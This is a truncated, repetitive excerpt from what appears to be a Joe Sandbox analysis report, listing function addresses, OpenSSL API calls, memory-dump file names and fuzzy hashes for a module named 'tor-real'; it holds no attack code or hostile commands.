                                                                            • String ID: A$P
                                                                            • API String ID: 2241039121-345673399
                                                                            • Opcode ID: 028d1fc4d1253df5c8480a91c0fe401b3be5030463156b998bb4a6d98eee3ee8
                                                                            • Instruction ID: 5bb07f94f5ef1c1c3bbdc39573e29e5adf4b60623ac395a4ebe9c9277a8ebb50
                                                                            • Opcode Fuzzy Hash: 028d1fc4d1253df5c8480a91c0fe401b3be5030463156b998bb4a6d98eee3ee8
                                                                            • Instruction Fuzzy Hash: 2321E2B06493459FD710DF64C584B9EBBE0FF88348F008A2CE8898B751D374E549CB86
                                                                            Function 6C0A4D80 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeX509_i2d_$__stack_chk_failmemcmp
                                                                            • String ID:
                                                                            • API String ID: 3513203242-0
                                                                            • Opcode ID: 666a8580d7c7af06d8470913a13082b9999fd732ea4db7b499578b2f9852e820
                                                                            • Instruction ID: 4311b3d24785c7ee32f65b3568a3355ec18f20256234eed8103ba5635420e056
                                                                            • Opcode Fuzzy Hash: 666a8580d7c7af06d8470913a13082b9999fd732ea4db7b499578b2f9852e820
                                                                            • Instruction Fuzzy Hash: 162110B5A093019FC700DFA4D58474EBBF4AF89648F40892DE89497B00DB31E8898B92
                                                                            Function 6C094670 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0946A1
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094777
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zallocR_put_error
                                                                            • String ID: A
                                                                            • API String ID: 2718799170-3554254475
                                                                            • Opcode ID: 5d67c39e365463238e1186fe2992385150898bbe21681da81d56b66bd31e9946
                                                                            • Instruction ID: 668cb2bfe34b567be959aa1bda81a5d628ec9e264a32957f3182c28acf8f5dc2
                                                                            • Opcode Fuzzy Hash: 5d67c39e365463238e1186fe2992385150898bbe21681da81d56b66bd31e9946
                                                                            • Instruction Fuzzy Hash: 056147756093059FCB00CFA8C19030AFBE0EF89754F198569ECA89B715E770E944DF92
                                                                            Function 6C0B6CB0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0B6D05
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0B6DDD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_freeO_malloc
                                                                            • String ID: $A$P
                                                                            • API String ID: 1578198043-3278419925
                                                                            • Opcode ID: f7a960d224311375dfdfdeadf0591b1bd3bc5c65f1ac6e41aea131efaa7cb652
                                                                            • Instruction ID: e888e4fa8138de4c7a96e7c560ad21b20ceedd428e01a1f427611d90b021b35f
                                                                            • Opcode Fuzzy Hash: f7a960d224311375dfdfdeadf0591b1bd3bc5c65f1ac6e41aea131efaa7cb652
                                                                            • Instruction Fuzzy Hash: F04115B56083458FC700DF64C48579FBBE0BF84348F158D6DE898AB711D379E9488B52
                                                                            Function 6C0C6A8B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: D$P
                                                                            • API String ID: 0-307317852
                                                                            • Opcode ID: be17890bd63685f8ca02bacf3455dc8bb1d67081f470b05ca25e33168b829bc8
                                                                            • Instruction ID: 3cd895f9e2e3994302eee6fc29a15294647fdbf2ef9a6acceba8b232995e90e7
                                                                            • Opcode Fuzzy Hash: be17890bd63685f8ca02bacf3455dc8bb1d67081f470b05ca25e33168b829bc8
                                                                            • Instruction Fuzzy Hash: 264128B02087529BD3249F65C5947AEFBE4FB85308F50C91DE4988B740D779E589CF82
                                                                            Function 6C0E48B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0E48F2
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0E4965
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_malloc
                                                                            • String ID: A
                                                                            • API String ID: 2609694610-3554254475
                                                                            • Opcode ID: 1fa2353a14f2490ff03e8eb918f5fae3cb946200fd5a3e12bfcb0e11957e36bf
                                                                            • Instruction ID: ae457c4e922e46ec356d404a7e4c80bff7701c05ee28f26dfdaa94c5aca37a07
                                                                            • Opcode Fuzzy Hash: 1fa2353a14f2490ff03e8eb918f5fae3cb946200fd5a3e12bfcb0e11957e36bf
                                                                            • Instruction Fuzzy Hash: A8318B716083159FC700DFA8D48025EFBE0EF88359F10CA2DE9989B760D775E845CB96
                                                                            Function 6C0B2426 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: A
                                                                            • API String ID: 2581946324-3554254475
                                                                            • Opcode ID: 74310918158e700f260c1b64311b3f4f6143fd2bd62fed2361f2573d4238d492
                                                                            • Instruction ID: b2db8b389708460014961cde0822eea4a7ebd39844adbf87dc1b7b67e68b4570
                                                                            • Opcode Fuzzy Hash: 74310918158e700f260c1b64311b3f4f6143fd2bd62fed2361f2573d4238d492
                                                                            • Instruction Fuzzy Hash: D8217CB15097119FE710CF54D88439BBBE0EF8434DF14886DE8A8AFA45D736D8858B81
                                                                            Function 6C0D4FA6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4C7B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4C83
                                                                            • EVP_DigestSign.LIBCRYPTO-1_1 ref: 6C0D4DA9
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4E3B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4E43
                                                                            • RSA_pkey_ctx_ctrl.LIBCRYPTO-1_1 ref: 6C0D4FDB
                                                                            • RSA_pkey_ctx_ctrl.LIBCRYPTO-1_1 ref: 6C0D5013
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: A_pkey_ctx_ctrlO_freeX_free$DigestSign
                                                                            • String ID: P
                                                                            • API String ID: 1404439906-3110715001
                                                                            • Opcode ID: e6b5fc359dfb5076f04cf8effa2cf96ee3d1d6eda7d12a691f8abf0746172214
                                                                            • Instruction ID: b97f953ccd986b1448e3ac493bdf5b461021425258754cfd293b13e204fd3b35
                                                                            • Opcode Fuzzy Hash: e6b5fc359dfb5076f04cf8effa2cf96ee3d1d6eda7d12a691f8abf0746172214
                                                                            • Instruction Fuzzy Hash: 16219EB01087419FD310DF25D48475FBBE0BB88368F118E1DE4E95B6A0C7B9A58A9F82
                                                                            Function 6C0DADC7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0DAA9B
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0DAAA7
                                                                            • HMAC_CTX_free.LIBCRYPTO-1_1 ref: 6C0DAAB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_free$O_freeR_put_error
                                                                            • String ID: A$P
                                                                            • API String ID: 3066917576-345673399
                                                                            • Opcode ID: 08ebc3b86f6c30aac3b9ef1a50f77874497405297c5b65ee679e2824f0d36f0b
                                                                            • Instruction ID: 83890e4ae39cfbca3d08337fb5e1cd1bda5b5b114a57fb31d88d7f3f5d93ef45
                                                                            • Opcode Fuzzy Hash: 08ebc3b86f6c30aac3b9ef1a50f77874497405297c5b65ee679e2824f0d36f0b
                                                                            • Instruction Fuzzy Hash: 76111671A093018FE350DF15D58475ABBF0AF84718FA5992DE4988BB50C779E8888B82
                                                                            Function 6C0DAD4B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0DAA9B
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0DAAA7
                                                                            • HMAC_CTX_free.LIBCRYPTO-1_1 ref: 6C0DAAB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_free$O_freeR_put_error
                                                                            • String ID: D$P
                                                                            • API String ID: 3066917576-307317852
                                                                            • Opcode ID: 001e01cc622a91fd8fc4ad559f7865db7ba9fe4bb620757c684dca3574fcb021
                                                                            • Instruction ID: 8719a979c4aa7b8af7ea997f859a207e887afebf915bf284306c7784f0e46830
                                                                            • Opcode Fuzzy Hash: 001e01cc622a91fd8fc4ad559f7865db7ba9fe4bb620757c684dca3574fcb021
                                                                            • Instruction Fuzzy Hash: 98112871A09301CFD350DF15D18075EBBF0EF84758FA5992CE4988BB50C379E9898B86
                                                                            Function 6C0B4B18 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4B3A
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B4B45
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4B5D
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B4B8F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free
                                                                            • String ID: A
                                                                            • API String ID: 3920316597-3554254475
                                                                            • Opcode ID: 973ceca8586ad455131d60e0f03b9e84616cac8bc7ef76468d00d481adab1d12
                                                                            • Instruction ID: a844d426dc860195472960f7dc52278e62b676a64fad91a80b12f61ab2f71d88
                                                                            • Opcode Fuzzy Hash: 973ceca8586ad455131d60e0f03b9e84616cac8bc7ef76468d00d481adab1d12
                                                                            • Instruction Fuzzy Hash: F911F3712487009FD700DFA4D48079EBBF0FF85369F61891CE6A8ABB50C739E5448B96
                                                                            Function 6C0B4C41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B4B8F
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4C5F
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B4C6E
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B4C86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free
                                                                            • String ID: A
                                                                            • API String ID: 3920316597-3554254475
                                                                            • Opcode ID: 708489c26c4fd639e6e42f375563f7b9b1b6eee21c853443ef9ec26ddd0dfb72
                                                                            • Instruction ID: 0f2a0bee33aaf5ea01b2eec33264e0d7724eb566c10c464349fa544385b988cb
                                                                            • Opcode Fuzzy Hash: 708489c26c4fd639e6e42f375563f7b9b1b6eee21c853443ef9ec26ddd0dfb72
                                                                            • Instruction Fuzzy Hash: 3D0157712083009FD700DFA4D48035EBBF0EF85369F61891DE2A8ABB50C739D5448B96
                                                                            Function 6C0AECE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free__stack_chk_fail
                                                                            • String ID: A
                                                                            • API String ID: 28610519-3554254475
                                                                            • Opcode ID: 918b84e5ea3048b1f673dbdba83a6bb12237126ded04094d38ddf57a274a7bea
                                                                            • Instruction ID: 96ca64680f9003f749bf390d7d26a61aa3f5955082bc8007de628cef5223545d
                                                                            • Opcode Fuzzy Hash: 918b84e5ea3048b1f673dbdba83a6bb12237126ded04094d38ddf57a274a7bea
                                                                            • Instruction Fuzzy Hash: 7801D2B52487059FD3009FA4D08079EBBF0BF84358F61CE0DE1A85BB90C779A5498B86
                                                                            Function 6C0AEBEB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free__stack_chk_fail
                                                                            • String ID: A
                                                                            • API String ID: 28610519-3554254475
                                                                            • Opcode ID: 3b06e9dfdb4a104a03f807d24a346137d9bf364dc583aa16a8203e95351aedfd
